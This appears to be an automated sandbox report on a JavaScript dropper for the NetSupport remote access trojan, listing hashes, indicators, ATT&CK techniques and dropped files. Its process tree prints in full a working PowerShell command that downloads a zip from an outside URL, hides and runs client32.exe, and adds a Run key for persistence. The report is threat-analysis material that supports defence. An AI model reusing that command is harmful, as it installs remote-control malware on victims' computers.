netsupport | b701b7d7b422726d96c25c50d7a5989ebadc641cdc95f8e1b97e6752c7c112a4

Analysis

max time kernel
135s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
05-06-2023 11:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06345999.js
Size

60KB
MD5

8189d2de48c65f16e5f9a1e27cf6b53d
SHA1

2b4cf31128f780b9b9efe98fa7e3921277b70197
SHA256

b701b7d7b422726d96c25c50d7a5989ebadc641cdc95f8e1b97e6752c7c112a4
SHA512

5cc1440a6aec6d5aab8d7bd4015b3cef0ca39e12c5ccfd6b69c691d32f9d31621e7fae878cd509a193ea6ae103fa18fde4edee7f345a6aee07b7e6346737c165
SSDEEP

768:wvcaomCt7cyFwu6MfJHN4V5DaYz+HsMceNeRcU:BnVcEIMU5BzcJ5NU

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.snappyshop.it/img/index.php

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 7 IoCs

flow	pid	Process
4	1440	wscript.exe
7	1440	wscript.exe
26	1440	wscript.exe
28	1440	wscript.exe
32	1440	wscript.exe
36	1440	wscript.exe
38	1440	wscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
2716	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
2716	client32.exe
2716	client32.exe
2716	client32.exe
2716	client32.exe
2716	client32.exe
2716	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ClockUTCSync_3765 = "C:\\Users\\Admin\\AppData\\Roaming\\ClockUTCSync_3765\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
932	powershell.exe
932	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	932	powershell.exe
Token: SeSecurityPrivilege	2716	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2716	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1440 wrote to memory of 932	1440	wscript.exe	84
PID 1440 wrote to memory of 932	1440	wscript.exe	84
PID 932 wrote to memory of 2716	932	powershell.exe	91
PID 932 wrote to memory of 2716	932	powershell.exe	91
PID 932 wrote to memory of 2716	932	powershell.exe	91

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\06345999.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "cd $env:AppData; $linok='https://www.snappyshop.it/img/index.php'; $rnums=Get-Random -minimum 5 -maximum 9; $r_rnum=Get-Random -minimum 1051 -maximum 8989; $chrs='abcdefgjklmntuvwxyzABCDEFGHILMNOTUWXYZ1256890'; $r_strng=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnums; $i++) {$r_strng+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$r_strng+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pezip_=$env:APPDATA+'\ClockUTCSync_'+$r_rnum; Start-BitsTransfer -Source $linok -Destination $Path; expand-archive -path $path -destinationpath $pezip_; $FOLD=Get-Item $pezip_ -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pezip_; start client32.exe; $fstrng=$pezip_+'\client32.exe'; $ranome='ClockUTCSync_'+$r_rnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $ranome -Value $fstrng -PropertyType 'String'; #x(M9XBc)v^w+*)#57h9Y0Abp8+tOmB$FVRTnMrqQL%N(tEbR020XYcXZGZ9otY7IC=0$SNJ5PO)Umr#CpVg7ffL+Gvl@sjQUWkuC3NE99T=TUVTryJHSRtWgExrQ)*YJ_#qH%5PLij%Sx5t!Mi$fJqI#l$UCI^GPxFEYxjReFcieh^3EOiXcdA&f%+uTmm6MMon-yu=dXAcW^!51zYYky8w!BAC92Lzipv*!m+qWhhwwLs7SH&oicaPD@oarg*#&DnSJk2&WEIE%jgR%+$U^p9Is)f*CTtE9*a(pH$MawvRL6O!Dpfh0Pa$$AslRtD4hl-To)^^DnoLspQL^YOuHuu0!+*$9dy4bg#E4x0i=6&(9*$b51eWCO13SUJrZIPg3G!EWCs$_aoy%sX7T&)8nh*1RNMWay0MJShOi^@S$3sZ8pKb8=ztxmUE(xy9_6eKYBYsDDkHlFwLLSIQY)6tKUJVMqMI02WMsr4D02cAOIbvN!oUqQE2C7Y6Q%KjLaGu2Ux)_!ppmXSz$rGSR_a8e33oHLliA)Xx&mWOnV55K=nBPh2sVn9D$Fe4&T0bnlCk61r6zaUkdVyDcw%C@i&gVrQmwFy6!4Ba2Qko5sSf*KW-Zyi@wWkV#HC+K4tITDQ*biT5^WDEM^8y&1)7J*hRgsJOss(O3%2BZ1jq20Rt$y01EBozeZJYpexG^MG&8S(t1Babclobbs^w2!_p7I(QWjr$_THGL0eVSlB&=jmOgHdljs9nK*22i@3s24AwN!E5#Q!!62Eqpe(r@7ZP#r*z$J_SUEdvNQTodAIFlf&rA^Jl(0u0WVWEz4cs=bK3p!s!B4c6JoF__O59vZigf#3ZM-PJQ03gU5UT=NL@m1EQR+fNT)QQQtUTi6&KS9+&ur+!0xJ6i7dv!90*iHJ%+-O9#g%$r214Y(XOSG3S7ay&9w2Aqw1!5=4Iaf^-5s7W0fk3BQ)NAoybvZTi(h7&voKDJ+r%DM*P=&rc%-l-7J_eSZR#aJ77e9BbOA^MpYi+vFznC8e^BfE0$jxcTuI8y0VDLq$9jSUQfW1=Em@+^Ncpw)cE1Q#N==t0Wk_*hYmWc!GB+s^^3^G_+@^!qrsj7CpYMhEV0q5%vzAv)9dra(=-NHM*k=eC&UNY1qSCgmKURJS*_Vrdp-WXBASGx^4C)LtAtpwP0qsLW_$wI2GNSdq9n#@u0MOlFh66+l-NDrdmDgCv)sGjvAApsjnDHA35Mh#o9fkq=r_b_uvBWEPO3=i=cN9*L@ekI9tVgCMDy#(mRDd4mJTv+KqUCZHMzRMo5VxbY*vw67u$+BX@F+d)KjAxvS$kl!-w-O@_#QAe-qlYZg#4m$4i0D=gu-iev8f*^H8#*pf1-X_mI+=3yIcrr^Cw9tt8&ZoC85LV3Gb2AYAQ_eafU!I4Ac@Mu0@qSyW$_VQ_kt_Neat&=Ez+3Vo9Na(iv^m^E265F8)W1EGZ=@_E$%G0o%$lQY-Cb%0lvfGA+IL6X!(cb*sP65yf-WiEbtb4Z7pGlYEQDa!$65bdLkP$1_ZW0t_h$a-8zANjg3)xc^-X1z#oai3K(c#oNZJCqueWGeUctvyhGI(9kdY7H0%u_ipyZXNMGTESGr&cD(YkuC%tbfc8GYWyhQy)_vHlqH0PAKqDt&uYgJm!CQ_kR0xpf+Tqo$J-JVY+BNk8z*%iif$euV6%7z3j6JPi3m3ySVVDT3&m51lvj-QEzXw(9l7lWHmgEb^acosEOi#MV)$$KDv-0V&nARQMp1tWwxwOz5MI)uPmqae_29Uv0@hB@iRCU4)UdtHaqgy#4C04e*5gyz+FxsZC$S%znr3M+M0w2(1PnNenfrd6JtSjxQ=S41aB^jE)AgtVfn@q&oxU89^#nf&xpmPSS_6hqEJ^1ulKRI-uKuDNBBD08Jb_AA+Onc0m3p1S%TLRs^Fi-969$tozWQY5noEmM##7*SypMlZiZX($$sUDmft!h7A#sWjjxPgIaLqhdx-A+KTYUrajeu9Q"
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:932
- - C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.exe
    "C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2716

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4zxqxi3.cg1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\HTCTL32.DLL

Filesize
320KB

MD5
c94005d2dcd2a54e40510344e0bb9435

SHA1
55b4a1620c5d0113811242c20bd9870a1e31d542

SHA256
3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

SHA512
2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\PCICL32.DLL

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\PCICL32.dll

Filesize
3.6MB

MD5
d3d39180e85700f72aaae25e40c125ff

SHA1
f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

SHA256
38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

SHA512
471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\client32.ini

Filesize
918B

MD5
49400d0ebc34337537a77a3edb5bf120

SHA1
6c3e1a7760e4b33ee34d475e71dc3ed71fc0c6fe

SHA256
36cb67c124cbf975b03a7cd5e6cf026368fd78ba7d486a78dac242c71e41ece9

SHA512
65ec9c7a6230ee3daa182c5c470ded00af9e3725bdbf7dac7c7c12a2136b5bb7914f63dcef641186db76301f43f156dc512c7be4922f3559a5d5e028c7e4df86

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
C:\Users\Admin\AppData\Roaming\ClockUTCSync_3765\pcichek.dll

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
memory/932-144-0x000001F6FBE10000-0x000001F6FBE32000-memory.dmp

Filesize
136KB

Download
memory/932-152-0x000001F6FC1F0000-0x000001F6FC1FA000-memory.dmp

Filesize
40KB

Download
memory/932-151-0x000001F6FC200000-0x000001F6FC212000-memory.dmp

Filesize
72KB

Download
memory/932-150-0x000001F6FC1C0000-0x000001F6FC1D4000-memory.dmp

Filesize
80KB

Download
memory/932-149-0x000001F6FB450000-0x000001F6FB460000-memory.dmp

Filesize
64KB

Download
memory/932-148-0x000001F6FB450000-0x000001F6FB460000-memory.dmp

Filesize
64KB

Download